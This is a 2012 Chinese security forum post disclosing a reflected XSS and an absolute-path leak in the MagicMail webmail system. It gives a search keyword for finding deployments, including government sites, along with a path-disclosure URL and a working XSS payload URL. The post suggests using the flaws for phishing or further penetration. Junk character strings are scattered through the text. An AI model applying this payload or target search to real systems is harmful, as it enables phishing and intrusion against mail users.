找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1950|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
9 b; ~  y6 a0 R( l& G1 J
! s$ R" u& h  e/ m6 ]+ X
/ [# y7 ?+ J7 c7 n9 S) |包含  一个反射性XSS  以及  绝对路径泄漏( Y. b: s) e; \  [
看了看 貌似全部是linux的。! X2 d$ [. w$ e2 }% X

3 w2 U/ G. j2 O, g% X关键字:迈捷邮件系统 by MagicMail
7 J: W0 {% o  c  J: `* B9 r4 @0 O0 H& u! \- J' Z6 g
可以看到很多政府网站都用这个邮件系统' F; b7 L- K9 ?1 j1 W9 e, h) q. j
3 F1 Y/ N& y0 y: C$ E# I) M8 ~
绝对路径 http://madman.in/index.php?login_type=declare&language=' y. B) ~, u9 M5 ]& D$ `! \9 \

2 ?& m, U4 _$ p" q6 j( v- G7 q5 s3 ]
# Y4 v3 J6 l. ~
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
% z* T! z. C! K) D, p$ y: r  B( ~* ^& d) I: {: L" c7 Q

  ~+ p/ {' i; t) i$ [
, m5 v$ C& c, o, M4 G0 R! C虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
7 v( g: _! i( N6 G
7 i% h3 U9 r# c0 s# b6 q6 Q修复方案:看官方补丁吧。8 S, r5 s9 u1 f, I5 O2 x7 L. Y; g% l" C9 Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表